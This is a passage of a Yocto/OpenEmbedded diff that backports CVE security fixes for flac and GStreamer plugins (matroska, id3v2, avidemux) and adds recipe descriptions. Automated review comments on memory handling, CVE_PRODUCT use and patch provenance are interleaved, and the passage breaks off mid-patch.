+ return false;
+ m->needs_delete = (FLAC__bool*)x;
+ m->metadata[m->num_metadata] = d;
+diff --git a/src/flac/foreign_metadata.c b/src/flac/foreign_metadata.c
+index 9ad9c18..fdfb3cf 100644
+--- a/src/flac/foreign_metadata.c
++++ b/src/flac/foreign_metadata.c
+@@ -75,7 +75,7 @@ static FLAC__bool copy_data_(FILE *fin, FILE *fout, size_t size, const char **er
+
+ static FLAC__bool append_block_(foreign_metadata_t *fm, FLAC__off_t offset, FLAC__uint32 size, const char **error)
+ {
+- foreign_block_t *fb = safe_realloc_muladd2_(fm->blocks, sizeof(foreign_block_t), /*times (*/fm->num_blocks, /*+*/1/*)*/);
++ foreign_block_t *fb = safe_realloc_nofree_muladd2_(fm->blocks, sizeof(foreign_block_t), /*times (*/fm->num_blocks, /*+*/1/*)*/);
+ if(fb) {
+ fb[fm->num_blocks].offset = offset;
+ fb[fm->num_blocks].size = size;
+diff --git a/src/libFLAC/bitwriter.c b/src/libFLAC/bitwriter.c
+index 6e86585..a510b0d 100644
+--- a/src/libFLAC/bitwriter.c
++++ b/src/libFLAC/bitwriter.c
+@@ -124,7 +124,7 @@ FLAC__bool bitwriter_grow_(FLAC__BitWriter *bw, uint32_t bits_to_add)
+ FLAC__ASSERT(new_capacity > bw->capacity);
+ FLAC__ASSERT(new_capacity >= bw->words + ((bw->bits + bits_to_add + FLAC__BITS_PER_WORD - 1) / FLAC__BITS_PER_WORD));
+
+- new_buffer = safe_realloc_mul_2op_(bw->buffer, sizeof(bwword), /*times*/new_capacity);
++ new_buffer = safe_realloc_nofree_mul_2op_(bw->buffer, sizeof(bwword), /*times*/new_capacity);
+ if(new_buffer == 0)
+ return false;
+ bw->buffer = new_buffer;
+diff --git a/src/libFLAC/metadata_object.c b/src/libFLAC/metadata_object.c
+index de8e513..aef65be 100644
+--- a/src/libFLAC/metadata_object.c
++++ b/src/libFLAC/metadata_object.c
+@@ -98,7 +98,7 @@ static FLAC__bool free_copy_bytes_(FLAC__byte **to, const FLAC__byte *from, uint
+ /* realloc() failure leaves entry unchanged */
+ static FLAC__bool ensure_null_terminated_(FLAC__byte **entry, uint32_t length)
+ {
+- FLAC__byte *x = safe_realloc_add_2op_(*entry, length, /*+*/1);
++ FLAC__byte *x = safe_realloc_nofree_add_2op_(*entry, length, /*+*/1);
+ if (x != NULL) {
+ x[length] = '\0';
+ *entry = x;
+diff --git a/src/plugin_common/tags.c b/src/plugin_common/tags.c
+index ae440c5..dfa10d3 100644
+--- a/src/plugin_common/tags.c
++++ b/src/plugin_common/tags.c
+@@ -317,7 +317,7 @@ FLAC__bool FLAC_plugin__tags_add_tag_utf8(FLAC__StreamMetadata *tags, const char
+ const size_t value_len = strlen(value);
+ const size_t separator_len = strlen(separator);
+ FLAC__byte *new_entry;
+- if(0 == (new_entry = safe_realloc_add_4op_(entry->entry, entry->length, /*+*/value_len, /*+*/separator_len, /*+*/1)))
++ if(0 == (new_entry = safe_realloc_nofree_add_4op_(entry->entry, entry->length, /*+*/value_len, /*+*/separator_len, /*+*/1)))
+ return false;
+ memcpy(new_entry+entry->length, separator, separator_len);
+ entry->length += separator_len;
+diff --git a/src/share/utf8/iconvert.c b/src/share/utf8/iconvert.c
+index 8ab53c1..876c06e 100644
+--- a/src/share/utf8/iconvert.c
++++ b/src/share/utf8/iconvert.c
+@@ -149,7 +149,7 @@ int iconvert(const char *fromcode, const char *tocode,
+ iconv_close(cd1);
+ return ret;
+ }
+- newbuf = safe_realloc_add_2op_(utfbuf, (ob - utfbuf), /*+*/1);
++ newbuf = safe_realloc_nofree_add_2op_(utfbuf, (ob - utfbuf), /*+*/1);
+ if (!newbuf)
+ goto fail;
+ ob = (ob - utfbuf) + newbuf;
+--
+2.40.0
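Review bot: The new `safe_realloc_nofree_mul_2op_` and `safe_realloc_nofree_muladd2_` helpers in alloc.h still forward a zero size as `realloc(ptr, 0)`, which on some C libraries frees `ptr` and returns NULL. A caller following the nofree contract would read that NULL as failure and keep using or freeing the old pointer, which is the double-free pattern this patch sets out to remove. The callers converted here always add 1 to the count or assert a growing capacity, so the zero path does not look reachable from them, but nothing in the header states that requirement. As this is a backport I would not diverge from the upstream code, only document it on both helpers, e.g. `/* size 0: realloc(ptr, 0) may free ptr and return NULL; callers must never pass a zero size */`. Separately, `safe_realloc_add_2op_` and `safe_realloc_add_4op_` no longer appear after the alloc.h hunks, so confirm that 1.3.3 has no other callers of those names beyond the ones converted here.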
diff --git a/meta/recipes-multimedia/flac/files/CVE-2021-0561.patch b/meta/recipes-multimedia/flac/files/CVE-2021-0561.patch
new file mode 100644
index 0000000000..e19833a5ad
--- /dev/null
+++ b/meta/recipes-multimedia/flac/files/CVE-2021-0561.patch
@@ -0,0 +1,34 @@
+From e1575e4a7c5157cbf4e4a16dbd39b74f7174c7be Mon Sep 17 00:00:00 2001
+From: Neelkamal Semwal <neelkamal.semwal@ittiam.com>
+Date: Fri, 18 Dec 2020 22:28:36 +0530
+Subject: [PATCH] libFlac: Exit at EOS in verify mode
+
+When verify mode is enabled, once decoder flags end of stream,
+encode processing is considered complete.
+
+CVE-2021-0561
+
+Signed-off-by: Ralph Giles <giles@thaumas.net>
+
+Upstream-Status: Backport [https://github.com/xiph/flac/commit/e1575e4a7c5157cbf4e4a16dbd39b74f7174c7be]
+CVE: CVE-2021-0561
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/libFLAC/stream_encoder.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/src/libFLAC/stream_encoder.c b/src/libFLAC/stream_encoder.c
+index 4c91247fe8..7109802c27 100644
+--- a/src/libFLAC/stream_encoder.c
++++ b/src/libFLAC/stream_encoder.c
+@@ -2610,7 +2610,9 @@ FLAC__bool write_bitbuffer_(FLAC__StreamEncoder *encoder, uint32_t samples, FLAC
+ encoder->private_->verify.needs_magic_hack = true;
+ }
+ else {
+- if(!FLAC__stream_decoder_process_single(encoder->private_->verify.decoder)) {
++ if(!FLAC__stream_decoder_process_single(encoder->private_->verify.decoder)
++ || (!is_last_block
++ && (FLAC__stream_encoder_get_verify_decoder_state(encoder) == FLAC__STREAM_DECODER_END_OF_STREAM))) {
+ FLAC__bitwriter_release_buffer(encoder->private_->frame);
+ FLAC__bitwriter_clear(encoder->private_->frame);
+ if(encoder->protected_->state != FLAC__STREAM_ENCODER_VERIFY_MISMATCH_IN_AUDIO_DATA)
diff --git a/meta/recipes-multimedia/flac/flac_1.3.3.bb b/meta/recipes-multimedia/flac/flac_1.3.3.bb
index cb6692aedf..e593727ac8 100644
--- a/meta/recipes-multimedia/flac/flac_1.3.3.bb
+++ b/meta/recipes-multimedia/flac/flac_1.3.3.bb
@@ -15,6 +15,8 @@ LIC_FILES_CHKSUM = "file://COPYING.FDL;md5=ad1419ecc56e060eccf8184a87c4285f \
DEPENDS = "libogg"
SRC_URI = "http://downloads.xiph.org/releases/flac/${BP}.tar.xz \
+ file://CVE-2020-22219.patch \
+ file://CVE-2021-0561.patch \
"
SRC_URI[md5sum] = "26703ed2858c1fc9ffc05136d13daa69"
diff --git a/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb b/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb
index cc7a7e78e2..6494013e3f 100644
--- a/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb
+++ b/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb
@@ -1,10 +1,13 @@
SUMMARY = "GStreamer examples (including gtk-play, gst-play)"
+DESCRIPTION = "GStreamer example applications"
+HOMEPAGE = "https://gitlab.freedesktop.org/gstreamer/gst-examples"
+BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-examples/-/issues"
LICENSE = "LGPL-2.0+"
LIC_FILES_CHKSUM = "file://playback/player/gtk/gtk-play.c;beginline=1;endline=20;md5=f8c72dae3d36823ec716a9ebcae593b9"
DEPENDS = "glib-2.0 gstreamer1.0 gstreamer1.0-plugins-base gstreamer1.0-plugins-bad gtk+3 glib-2.0-native"
-SRC_URI = "git://gitlab.freedesktop.org/gstreamer/gst-examples.git;protocol=https \
+SRC_URI = "git://gitlab.freedesktop.org/gstreamer/gst-examples.git;protocol=https;branch=master \
file://0001-Make-player-examples-installable.patch \
file://gst-player.desktop \
"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb
index 98355a1b75..a8ad777422 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb
@@ -1,4 +1,6 @@
SUMMARY = "Libav-based GStreamer 1.x plugin"
+DESCRIPTION = "Contains a GStreamer plugin for using the encoders, decoders, \
+muxers, and demuxers provided by FFmpeg."
HOMEPAGE = "http://gstreamer.freedesktop.org/"
SECTION = "multimedia"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb
index 1aa13cf73c..46653e2392 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb
@@ -1,4 +1,5 @@
SUMMARY = "OpenMAX IL plugins for GStreamer"
+DESCRIPTION = "Wraps available OpenMAX IL components and makes them available as standard GStreamer elements."
HOMEPAGE = "http://gstreamer.freedesktop.org/"
SECTION = "multimedia"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb
index ffbaaf425a..f741db2172 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb
@@ -1,5 +1,9 @@
require gstreamer1.0-plugins-common.inc
+DESCRIPTION = "'Bad' GStreamer plugins and helper libraries "
+HOMEPAGE = "https://gstreamer.freedesktop.org/"
+BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-plugins-bad/-/issues"
+
SRC_URI = " \
https://gstreamer.freedesktop.org/src/gst-plugins-bad/gst-plugins-bad-${PV}.tar.xz \
file://0001-meson-build-gir-even-when-cross-compiling-if-introsp.patch \
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base/CVE-2021-3522.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base/CVE-2021-3522.patch
new file mode 100644
index 0000000000..3717f0cf3a
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base/CVE-2021-3522.patch
@@ -0,0 +1,36 @@
+From 067e759136904b82bba9c6d1d781c4408dfecfe6 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Tim-Philipp=20M=C3=BCller?= <tim@centricular.com>
+Date: Wed, 3 Mar 2021 01:08:25 +0000
+Subject: [PATCH] tag: id3v2: fix frame size check and potential invalid reads
+
+Check the right variable when checking if there's
+enough data left to read the frame size.
+
+Closes https://gitlab.freedesktop.org/gstreamer/gst-plugins-base/-/issues/876
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gst-plugins-base/-/merge_requests/1066>
+
+Upstream-Status: Backport
+[https://gstreamer.freedesktop.org/security/sa-2021-0001.html]
+CVE: CVE-2021-3522
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ gst-libs/gst/tag/id3v2frames.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/gst-libs/gst/tag/id3v2frames.c b/gst-libs/gst/tag/id3v2frames.c
+index 8e9f782..f39659b 100644
+--- a/gst-libs/gst/tag/id3v2frames.c
++++ b/gst-libs/gst/tag/id3v2frames.c
+@@ -109,7 +109,7 @@ id3v2_parse_frame (ID3TagsWorking * work)
+
+ if (work->frame_flags & (ID3V2_FRAME_FORMAT_COMPRESSION |
+ ID3V2_FRAME_FORMAT_DATA_LENGTH_INDICATOR)) {
+- if (work->hdr.frame_data_size <= 4)
++ if (frame_data_size <= 4)
+ return FALSE;
+ if (ID3V2_VER_MAJOR (work->hdr.version) == 3) {
+ work->parse_size = GST_READ_UINT32_BE (frame_data);
+--
+2.17.1
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb
index a4f4772c1c..bcfdef3bbd 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb
@@ -1,5 +1,8 @@
require gstreamer1.0-plugins-common.inc
+DESCRIPTION = "'Base' GStreamer plugins and helper libraries"
+HOMEPAGE = "https://gstreamer.freedesktop.org/"
+BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-plugins-base/-/issues"
LICENSE = "GPLv2+ & LGPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=6762ed442b3822387a51c92d928ead0d \
file://common/coverage/coverage-report.pl;beginline=2;endline=17;md5=a4e1830fce078028c8f0974161272607"
@@ -12,6 +15,7 @@ SRC_URI = " \
file://0003-ssaparse-enhance-SSA-text-lines-parsing.patch \
file://0005-viv-fb-Make-sure-config.h-is-included.patch \
file://0009-glimagesink-Downrank-to-marginal.patch \
+ file://CVE-2021-3522.patch \
"
SRC_URI[md5sum] = "e3ddb1bae9fb510b49a295f212f1e6e4"
SRC_URI[sha256sum] = "9f02678b0bbbcc9eff107d3bd89d83ce92fec2154cd607c7c8bd34dc7fee491c"
@@ -97,3 +101,5 @@ def get_opengl_cmdline_list(switch_name, options, d):
return '-D' + switch_name + '=' + ','.join(selected_options)
else:
return ''
+
+CVE_PRODUCT += "gst-plugins-base"
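Review bot: The added `CVE_PRODUCT += "gst-plugins-base"` reads as "check this name as well", but its effect depends on how the default is assigned, which this hunk does not show. If the CVE-check class gives CVE_PRODUCT only a weak (`??=`) default, BitBake drops that default on `+=` and the variable ends up holding just the new name. If replacing the recipe name is the intent, `CVE_PRODUCT = "gst-plugins-base"` says so directly. If both names should be matched, list both explicitly, so the set of products scanned for this recipe does not depend on parse details.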
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3497.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3497.patch
new file mode 100644
index 0000000000..81f7c59a7b
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3497.patch
@@ -0,0 +1,207 @@
+From 9181191511f9c0be6a89c98b311f49d66bd46dc3 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Thu, 4 Mar 2021 13:05:19 +0200
+Subject: [PATCH] matroskademux: Fix extraction of multichannel WavPack
+
+The old code had a couple of issues that all lead to potential memory
+safety bugs.
+
+ - Use a constant for the Wavpack4Header size instead of using sizeof.
+ It's written out into the data and not from the struct and who knows
+ what special alignment/padding requirements some C compilers have.
+ - gst_buffer_set_size() does not realloc the buffer when setting a
+ bigger size than allocated, it only allows growing up to the maximum
+ allocated size. Instead use a GstAdapter to collect all the blocks
+ and take out everything at once in the end.
+ - Check that enough data is actually available in the input and
+ otherwise handle it an error in all cases instead of silently
+ ignoring it.
+
+Among other things this fixes out of bounds writes because the code
+assumed gst_buffer_set_size() can grow the buffer and simply wrote after
+the end of the buffer.
+
+Thanks to Natalie Silvanovich for reporting.
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/issues/859
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/merge_requests/903>
+
+Upstream-Status: Backport
+https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/commit/9181191511f9c0be6a89c98b311f49d66bd46dc3?merge_request_iid=903
+CVE: CVE-2021-3497
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ gst/matroska/matroska-demux.c | 99 +++++++++++++++++++----------------
+ gst/matroska/matroska-ids.h | 2 +
+ 2 files changed, 55 insertions(+), 46 deletions(-)
+
+diff --git a/gst/matroska/matroska-demux.c b/gst/matroska/matroska-demux.c
+index 467815986..0e47ee7b5 100644
+--- a/gst/matroska/matroska-demux.c
++++ b/gst/matroska/matroska-demux.c
+@@ -3851,6 +3851,12 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+ guint32 block_samples, tmp;
+ gsize size = gst_buffer_get_size (*buf);
+
++ if (size < 4) {
++ GST_ERROR_OBJECT (element, "Too small wavpack buffer");
++ gst_buffer_unmap (*buf, &map);
++ return GST_FLOW_ERROR;
++ }
++
+ gst_buffer_extract (*buf, 0, &tmp, sizeof (guint32));
+ block_samples = GUINT32_FROM_LE (tmp);
+ /* we need to reconstruct the header of the wavpack block */
+@@ -3858,10 +3864,10 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+ /* -20 because ck_size is the size of the wavpack block -8
+ * and lace_size is the size of the wavpack block + 12
+ * (the three guint32 of the header that already are in the buffer) */
+- wvh.ck_size = size + sizeof (Wavpack4Header) - 20;
++ wvh.ck_size = size + WAVPACK4_HEADER_SIZE - 20;
+
+ /* block_samples, flags and crc are already in the buffer */
+- newbuf = gst_buffer_new_allocate (NULL, sizeof (Wavpack4Header) - 12, NULL);
++ newbuf = gst_buffer_new_allocate (NULL, WAVPACK4_HEADER_SIZE - 12, NULL);
+
+ gst_buffer_map (newbuf, &outmap, GST_MAP_WRITE);
+ data = outmap.data;
+@@ -3886,9 +3892,11 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+ audiocontext->wvpk_block_index += block_samples;
+ } else {
+ guint8 *outdata = NULL;
+- guint outpos = 0;
+- gsize buf_size, size, out_size = 0;
++ gsize buf_size, size;
+ guint32 block_samples, flags, crc, blocksize;
++ GstAdapter *adapter;
++
++ adapter = gst_adapter_new ();
+
+ gst_buffer_map (*buf, &map, GST_MAP_READ);
+ buf_data = map.data;
+@@ -3897,6 +3905,7 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+ if (buf_size < 4) {
+ GST_ERROR_OBJECT (element, "Too small wavpack buffer");
+ gst_buffer_unmap (*buf, &map);
++ g_object_unref (adapter);
+ return GST_FLOW_ERROR;
+ }
+
+@@ -3918,59 +3927,57 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+ data += 4;
+ size -= 4;
+
+- if (blocksize == 0 || size < blocksize)
+- break;
+-
+- g_assert ((newbuf == NULL) == (outdata == NULL));
++ if (blocksize == 0 || size < blocksize) {
++ GST_ERROR_OBJECT (element, "Too small wavpack buffer");
++ gst_buffer_unmap (*buf, &map);
++ g_object_unref (adapter);
++ return GST_FLOW_ERROR;
++ }
+
+- if (newbuf == NULL) {
+- out_size = sizeof (Wavpack4Header) + blocksize;
+- newbuf = gst_buffer_new_allocate (NULL, out_size, NULL);
++ g_assert (newbuf == NULL);
+
+- gst_buffer_copy_into (newbuf, *buf,
+- GST_BUFFER_COPY_TIMESTAMPS | GST_BUFFER_COPY_FLAGS, 0, -1);
++ newbuf =
++ gst_buffer_new_allocate (NULL, WAVPACK4_HEADER_SIZE + blocksize,
++ NULL);
++ gst_buffer_map (newbuf, &outmap, GST_MAP_WRITE);
++ outdata = outmap.data;
++
++ outdata[0] = 'w';
++ outdata[1] = 'v';
++ outdata[2] = 'p';
++ outdata[3] = 'k';
++ outdata += 4;
++
++ GST_WRITE_UINT32_LE (outdata, blocksize + WAVPACK4_HEADER_SIZE - 8);
++ GST_WRITE_UINT16_LE (outdata + 4, wvh.version);
++ GST_WRITE_UINT8 (outdata + 6, wvh.track_no);
++ GST_WRITE_UINT8 (outdata + 7, wvh.index_no);
++ GST_WRITE_UINT32_LE (outdata + 8, wvh.total_samples);
++ GST_WRITE_UINT32_LE (outdata + 12, wvh.block_index);
++ GST_WRITE_UINT32_LE (outdata + 16, block_samples);
++ GST_WRITE_UINT32_LE (outdata + 20, flags);
++ GST_WRITE_UINT32_LE (outdata + 24, crc);
++ outdata += 28;
++
++ memcpy (outdata, data, blocksize);
+
+- outpos = 0;
+- gst_buffer_map (newbuf, &outmap, GST_MAP_WRITE);
+- outdata = outmap.data;
+- } else {
+- gst_buffer_unmap (newbuf, &outmap);
+- out_size += sizeof (Wavpack4Header) + blocksize;
+- gst_buffer_set_size (newbuf, out_size);
+- gst_buffer_map (newbuf, &outmap, GST_MAP_WRITE);
+- outdata = outmap.data;
+- }
++ gst_buffer_unmap (newbuf, &outmap);
++ gst_adapter_push (adapter, newbuf);
++ newbuf = NULL;
+
+- outdata[outpos] = 'w';
+- outdata[outpos + 1] = 'v';
+- outdata[outpos + 2] = 'p';
+- outdata[outpos + 3] = 'k';
+- outpos += 4;
+-
+- GST_WRITE_UINT32_LE (outdata + outpos,
+- blocksize + sizeof (Wavpack4Header) - 8);
+- GST_WRITE_UINT16_LE (outdata + outpos + 4, wvh.version);
+- GST_WRITE_UINT8 (outdata + outpos + 6, wvh.track_no);
+- GST_WRITE_UINT8 (outdata + outpos + 7, wvh.index_no);
+- GST_WRITE_UINT32_LE (outdata + outpos + 8, wvh.total_samples);
+- GST_WRITE_UINT32_LE (outdata + outpos + 12, wvh.block_index);
+- GST_WRITE_UINT32_LE (outdata + outpos + 16, block_samples);
+- GST_WRITE_UINT32_LE (outdata + outpos + 20, flags);
+- GST_WRITE_UINT32_LE (outdata + outpos + 24, crc);
+- outpos += 28;
+-
+- memmove (outdata + outpos, data, blocksize);
+- outpos += blocksize;
+ data += blocksize;
+ size -= blocksize;
+ }
+ gst_buffer_unmap (*buf, &map);
+- gst_buffer_unref (*buf);
+
+- if (newbuf)
+- gst_buffer_unmap (newbuf, &outmap);
++ newbuf = gst_adapter_take_buffer (adapter, gst_adapter_available (adapter));
++ g_object_unref (adapter);
+
++ gst_buffer_copy_into (newbuf, *buf,
++ GST_BUFFER_COPY_TIMESTAMPS | GST_BUFFER_COPY_FLAGS, 0, -1);
++ gst_buffer_unref (*buf);
+ *buf = newbuf;
++
+ audiocontext->wvpk_block_index += block_samples;
+ }
+
+diff --git a/gst/matroska/matroska-ids.h b/gst/matroska/matroska-ids.h
+index 429213f77..8d4a685a9 100644
+--- a/gst/matroska/matroska-ids.h
++++ b/gst/matroska/matroska-ids.h
+@@ -688,6 +688,8 @@ typedef struct _Wavpack4Header {
+ guint32 crc; /* crc for actual decoded data */
+ } Wavpack4Header;
+
++#define WAVPACK4_HEADER_SIZE (32)
++
+ typedef enum {
+ GST_MATROSKA_TRACK_ENCODING_SCOPE_FRAME = (1<<0),
+ GST_MATROSKA_TRACK_ENCODING_SCOPE_CODEC_DATA = (1<<1),
+--
+GitLab
+
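Review bot: In the first matroska-demux.c hunk the added `size < 4` error path calls `gst_buffer_unmap (*buf, &map)`, but that branch only reads the buffer through `gst_buffer_get_size()` and `gst_buffer_extract()`. No `gst_buffer_map (*buf, &map, ...)` is visible before it, whereas the multichannel branch below maps the buffer first. If `map` is indeed never mapped on that path, the unmap runs on an uninitialised GstMapInfo exactly when the input is malformed, and the branch should log and `return GST_FLOW_ERROR;` without unmapping. The start of gst_matroska_demux_add_wvpk_header is outside the hunk, so confirm against the full function and check whether upstream carries a follow-up fix that should be backported with this patch.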
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3498.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3498.patch
new file mode 100644
index 0000000000..d3de2d5014
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3498.patch
@@ -0,0 +1,44 @@
+From 02174790726dd20a5c73ce2002189bf240ad4fe0 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Wed, 3 Mar 2021 11:31:52 +0200
+Subject: [PATCH] matroskademux: Initialize track context out parameter to NULL
+ before parsing
+
+Various error return paths don't set it to NULL and callers are only
+checking if the pointer is NULL. As it's allocated on the stack this
+usually contains random stack memory, and more often than not the memory
+of a previously parsed track.
+
+This then causes all kinds of memory corruptions further down the line.
+
+Thanks to Natalie Silvanovich for reporting.
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/issues/858
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/merge_requests/903>
+
+Upstream-Status: Backport [
+https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/commit/02174790726dd20a5c73ce2002189bf240ad4fe0?merge_request_iid=903 ]
+CVE: CVE-2021-3498
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ gst/matroska/matroska-demux.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/gst/matroska/matroska-demux.c b/gst/matroska/matroska-demux.c
+index 4d0234743..467815986 100644
+--- a/gst/matroska/matroska-demux.c
++++ b/gst/matroska/matroska-demux.c
+@@ -692,6 +692,8 @@ gst_matroska_demux_parse_stream (GstMatroskaDemux * demux, GstEbmlRead * ebml,
+
+ DEBUG_ELEMENT_START (demux, ebml, "TrackEntry");
+
++ *dest_context = NULL;
++
+ /* start with the master */
+ if ((ret = gst_ebml_read_master (ebml, &id)) != GST_FLOW_OK) {
+ DEBUG_ELEMENT_STOP (demux, ebml, "TrackEntry", ret);
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1920.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1920.patch
new file mode 100644
index 0000000000..ee33c5564d
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1920.patch
@@ -0,0 +1,59 @@
+From cf887f1b8e228bff6e19829e6d03995d70ad739d Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Wed, 18 May 2022 10:23:15 +0300
+Subject: [PATCH] matroskademux: Avoid integer-overflow resulting in heap
+ corruption in WavPack header handling code
+
+blocksize + WAVPACK4_HEADER_SIZE might overflow gsize, which then
+results in allocating a very small buffer. Into that buffer blocksize
+data is memcpy'd later which then causes out of bound writes and can
+potentially lead to anything from crashes to remote code execution.
+
+Thanks to Adam Doupe for analyzing and reporting the issue.
+
+CVE: CVE-2022-1920
+
+https://gstreamer.freedesktop.org/security/sa-2022-0004.html
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gstreamer/-/issues/1226
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/2612>
+
+https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/0df0dd7fe388174e4835eda4526b47f470a56370
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ .../gst/matroska/matroska-demux.c | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/gst/matroska/matroska-demux.c b/gst/matroska/matroska-demux.c
+index 64cc6be60be..01d754c3eb9 100644
+--- a/gst/matroska/matroska-demux.c
++++ b/gst/matroska/matroska-demux.c
+@@ -3933,7 +3933,8 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+ } else {
+ guint8 *outdata = NULL;
+ gsize buf_size, size;
+- guint32 block_samples, flags, crc, blocksize;
++ guint32 block_samples, flags, crc;
++ gsize blocksize;
+ GstAdapter *adapter;
+
+ adapter = gst_adapter_new ();
+@@ -3974,6 +3975,13 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+ return GST_FLOW_ERROR;
+ }
+
++ if (blocksize > G_MAXSIZE - WAVPACK4_HEADER_SIZE) {
++ GST_ERROR_OBJECT (element, "Too big wavpack buffer");
++ gst_buffer_unmap (*buf, &map);
++ g_object_unref (adapter);
++ return GST_FLOW_ERROR;
++ }
++
+ g_assert (newbuf == NULL);
+
+ newbuf =
+--
+GitLab
+
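Review bot: The provenance in this patch header does not line up: the `From` line names commit cf887f1b8e228bff6e19829e6d03995d70ad739d, while the URL in the body points at 0df0dd7fe388174e4835eda4526b47f470a56370. `Upstream-Status: Backport` also carries no bracketed reference. The two hashes may simply be a stable-branch cherry-pick and the main-branch commit, but someone auditing the CVE fix cannot tell which one the diff was taken from. I would write `Upstream-Status: Backport [https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/0df0dd7fe388174e4835eda4526b47f470a56370]` and add one line stating which commit was actually applied.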
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1921.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1921.patch
new file mode 100644
index 0000000000..99dbb2b1b0
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1921.patch
@@ -0,0 +1,69 @@
+From f503caad676971933dc0b52c4b313e5ef0d6dbb0 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Wed, 18 May 2022 12:00:48 +0300
+Subject: [PATCH] avidemux: Fix integer overflow resulting in heap corruption
+ in DIB buffer inversion code
+
+Check that width*bpp/8 doesn't overflow a guint and also that
+height*stride fits into the provided buffer without overflowing.
+
+Thanks to Adam Doupe for analyzing and reporting the issue.
+
+CVE: CVE-2022-1921
+
